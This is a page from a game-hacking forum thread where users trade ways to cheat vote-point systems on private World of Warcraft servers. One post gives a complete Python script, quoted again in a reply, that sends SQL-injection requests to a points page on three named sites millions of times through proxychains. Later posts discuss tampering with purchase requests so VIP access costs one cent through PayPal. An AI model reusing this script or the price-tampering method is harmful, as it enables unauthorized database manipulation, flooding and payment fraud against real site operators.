Eternion wow vote points public now... menu

User Tag List

Page 6 of 15 FirstFirst ... 2345678910 ... LastLast
Results 76 to 90 of 224
  1. #76
    hypnotize191's Avatar Member
    Reputation
    2
    Join Date
    Jul 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Cool, i got it
    Last edited by hypnotize191; 02-28-2009 at 01:29 PM.

    Eternion wow vote points public now...
  2. #77
    hackerlol's Avatar Admin(kind of) i miss Watcher
    Authenticator enabled
    Reputation
    1031
    Join Date
    Oct 2008
    Posts
    1,079
    Thanks G/R
    1257/300
    Trade Feedback
    1 (100%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    its random I think...run multiple instances hypnotize.
    Thanks this works

  3. #78
    hypnotize191's Avatar Member
    Reputation
    2
    Join Date
    Jul 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by hackerlol View Post
    its random I think...run multiple instances hypnotize.
    Thanks this works
    What is random?

  4. #79
    WoWSondermüll's Avatar Member
    Reputation
    10
    Join Date
    Dec 2008
    Posts
    111
    Thanks G/R
    113/2
    Trade Feedback
    5 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Code:
    #!python
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points:)
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....
    
    from socket import *
    from time import sleep
    
    port = 80
    #new way faster voting
    request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
    request_pt2 = '&sn=1234809692227'
    
    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Current Exploitable Realms :')
    print('\t*-->eternion-wow id[1]')
    print('\t*-->WoW-Wal id[2]')
    print('\t*-->wowolympc.com id[3]')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
    if(len(name) > 0):
    	print('[-]Name : '+name)
    else:
    	print('Name Its Empty??WTF....')
    	exit(1)
    if(int(realm) == int(1)):
    	target = 'www.eternion-wow.com'
    if(int(realm) == int(2)):
    	target = 'www.wowwal.com'
    if(int(realm) == int(3)):
    	target = 'www.wowolympc.com'
    #basic browser request
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
    #since **** up everything
    count = 10000000#times to send votes to take:P
    print('[*]Requesting The Server !')
    for i in range(0,int(count)):
    	try:
    		i = socket(AF_INET,SOCK_STREAM)
    	except:
    		print('[/]Error In SOcket Function')
    	try:
    		i.connect((target,int(port)))
    	except:
    		print('[/]Error In Connect()')
    	try:
    		i.send(server_request)
    		print('[*]Request.....')
    		print(i.recv(10000))
    	except:
    		print('[/]Error In Send()')
    this is better, it reconnects and doesnt just stop and shutdown, just activate it and itll run the whole day, always reconnecting lol.

    whth this u can use like 10 a time, making 100 vp's/minute

    greez, Sondermüll

  5. #80
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I wish he makes a similar program for VIP/Donation things.

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  6. #81
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i can i have find something but i need a paypal account with 0$
    sence i dont have a paypal account i cant test it
    if it works

    seems automatic donation = big fail

  7. #82
    hypnotize191's Avatar Member
    Reputation
    2
    Join Date
    Jul 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by WoWSondermüll View Post
    Code:
    #!python
    #coding by DarkInjection And Post_Mortem Crew
    #from friends to friends
    #anyway this program just use a request that i have found in the site : eternion-wow.com
    #u can call it "bug" in our case getpoint.php this!!!!
    #so lets get the advantage of this bug and exploit the points:)
    #i hope this will be keept.... private.....
    #start....
    #btw this program its used to be run under linux cos u need a program called proxychains example: proxychains python vote_hack.py
    #posible can work in windows to.....
    
    from socket import *
    from time import sleep
    
    port = 80
    #new way faster voting
    request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
    request_pt2 = '&sn=1234809692227'
    
    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Current Exploitable Realms :')
    print('\t*-->eternion-wow id[1]')
    print('\t*-->WoW-Wal id[2]')
    print('\t*-->wowolympc.com id[3]')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
    if(len(name) > 0):
    	print('[-]Name : '+name)
    else:
    	print('Name Its Empty??WTF....')
    	exit(1)
    if(int(realm) == int(1)):
    	target = 'www.eternion-wow.com'
    if(int(realm) == int(2)):
    	target = 'www.wowwal.com'
    if(int(realm) == int(3)):
    	target = 'www.wowolympc.com'
    #basic browser request
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
    #since **** up everything
    count = 10000000#times to send votes to take:P
    print('[*]Requesting The Server !')
    for i in range(0,int(count)):
    	try:
    		i = socket(AF_INET,SOCK_STREAM)
    	except:
    		print('[/]Error In SOcket Function')
    	try:
    		i.connect((target,int(port)))
    	except:
    		print('[/]Error In Connect()')
    	try:
    		i.send(server_request)
    		print('[*]Request.....')
    		print(i.recv(10000))
    	except:
    		print('[/]Error In Send()')
    this is better, it reconnects and doesnt just stop and shutdown, just activate it and itll run the whole day, always reconnecting lol.

    whth this u can use like 10 a time, making 100 vp's/minute

    greez, Sondermüll
    This is like the same thing the original poster posted. I only get 1 vote point every 5 min using this...

    Can anyone help me get VPs alot faster on eternium WoW?

  8. #83
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by hypnotize191 View Post
    This is like the same thing the original poster posted. I only get 1 vote point every 5 min using this...

    Can anyone help me get VPs alot faster on eternium WoW?
    eternium wow got problem with the database so this is why u take 1 every 5
    on the other sites works great

  9. #84
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by karapidiola View Post
    i can i have find something but i need a paypal account with 0$
    sence i dont have a paypal account i cant test it
    if it works

    seems automatic donation = big fail
    So suppose you get an unverified empty paypal?

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  10. #85
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yes i need a paypal with an empty card

  11. #86
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    So if it's a non-verified? I am asking coz I have one, unverified.

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  12. #87
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    u have to verify ur card :/ else cant work i think

  13. #88
    hypnotize191's Avatar Member
    Reputation
    2
    Join Date
    Jul 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by karapidiola View Post
    u have to verify ur card :/ else cant work i think
    I think i know what ur talking about, u tamper data so that the vip costs 0.01$ and then you go buy...Well i tried by my account is unverified so it wouldnt work, kept asking me to verify by adding bank info.


    ALSO, howcome on the WOWOLYMPC server, i got the bunch of vote points on the website, but when i go ingame, i use the vote stone thing, and it says i got no points?
    Last edited by hypnotize191; 02-24-2009 at 01:13 PM.

  14. #89
    moofman's Avatar Contributor
    Reputation
    89
    Join Date
    Sep 2006
    Posts
    154
    Thanks G/R
    4/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Is there a guide for what the reward items actually are?


  15. #90
    Italian / Envy's Avatar Member
    Reputation
    13
    Join Date
    Jan 2009
    Posts
    128
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ALSO, howcome on the WOWOLYMPC server, i got the bunch of vote points on the website, but when i go ingame, i use the vote stone thing, and it says i got no points?[/QUOTE]


    You purchase the items on the website not in game.

Page 6 of 15 FirstFirst ... 2345678910 ... LastLast

Similar Threads

  1. eternion-wow vote hack
    By supernova1 in forum WoW EMU Questions & Requests
    Replies: 2
    Last Post: 05-01-2010, 09:45 AM
  2. eternion-wow vote hack
    By supernova1 in forum WoW Bots Questions & Requests
    Replies: 1
    Last Post: 05-01-2010, 09:42 AM
  3. Eternion-wow vote points exploid.
    By ludterror in forum WoW EMU Exploits & Bugs
    Replies: 2
    Last Post: 04-02-2010, 12:46 PM
  4. Eternion-wow Vote Expolit
    By knazze in forum WoW EMU Exploits & Bugs
    Replies: 5
    Last Post: 12-03-2009, 05:24 AM
All times are GMT -5. The time now is 01:17 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search